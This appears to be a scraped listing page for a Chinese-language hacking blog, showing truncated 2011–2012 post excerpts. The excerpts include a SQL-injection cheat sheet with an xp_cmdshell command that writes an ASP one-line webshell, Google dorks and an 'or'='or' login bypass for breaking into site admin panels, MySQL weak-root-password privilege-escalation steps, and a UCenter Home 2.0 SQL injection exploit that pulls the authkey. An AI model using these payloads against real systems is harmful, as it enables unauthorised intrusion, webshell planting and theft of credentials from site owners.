Scanrootkit - scanrootkit.com - Trickster_ScanRootkit
General Information:
Latest News:
看雪软件安全文档库(KSSD)2012版离线CHM 27 Apr 2012 | 02:53 pm
看雪软件安全文档库(KSSD)2012版离线CHM 转自promised_的BLOG http://hi.baidu.com/promised_lu/home 下载:http://115.com/file/e6tmjkkd 版权声明: 1. 看雪软件安全文档库(KanXue Software Security Documentation ,简称KSSD),收集了看雪安全网站 2000.1 ...
最详细的SQL注入相关的命令整理 18 Apr 2012 | 12:39 pm
最详细的SQL注入相关的命令整理 1、 用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell ‘echo ^>c:\mu.asp’;– ? echo ^< %execute^(request^(“l”^)^)%^> >c:\mu.asp 2、 显示SQ...
局域网DNS欺骗原理,攻击,防御 17 Apr 2012 | 01:37 pm
局域网DNS欺骗原理,攻击,防御 什么是DNS DNS 是域名系统 (Domain Name System) 的缩写.域名是由圆点分开一串单词或缩写组成的,每一个域名都对应一个惟一的IP地址,这一命名的方法或这样管理域名的系统叫做域名管理系统。该系统用于命名组织到域层次结构中的计算机和网络服务。在Internet上域名与IP地址之间是一一对应的,域名虽然便于人们记忆,但机器之间只能互相认识IP...
45种攻入后台的方法 28 Nov 2011 | 04:53 am
45种攻入后台的方法 1、到Google搜索,site:cq.cn inurl:asp 2、到Google,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! 3、利用挖掘鸡和一个ASP木马: 文件名是login.asp 路径组是/manage/ 关键词是went.asp 用’or’=’or’来登陆 4、以下这个方法因为太多人做过,所以一些网站管理员对此都有防范之心了,...
MYSQL用户root密码为弱口令提权方法 14 Nov 2011 | 02:40 pm
MYSQL用户Root密码为弱口令提权方法 1、连接到对方MYSQL 服务器 mysql -u root -h 192.168.0.1 2、查看对方数据库 mysql>show databases; MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。 3、进入数据库 mysql>use test; 进入test数据库中 4、查看...
MYSQL用户root密码为弱口令提权方法 14 Nov 2011 | 09:40 am
MYSQL用户Root密码为弱口令提权方法 1、连接到对方MYSQL 服务器 mysql -u root -h [...]
UCenter Home 2.0 鸡肋SQL 注入 13 Nov 2011 | 07:00 pm
UCenter Home 2.0 鸡肋SQL 注入. Exploit: 要求: magic_quote_gpc off URL: cp.php?ac=profile&op=base 保存时创建一个POST,参数名为: friend[a',(select 1 from(select count(*),concat((Select concat(substring(authkey,1,64)) F...
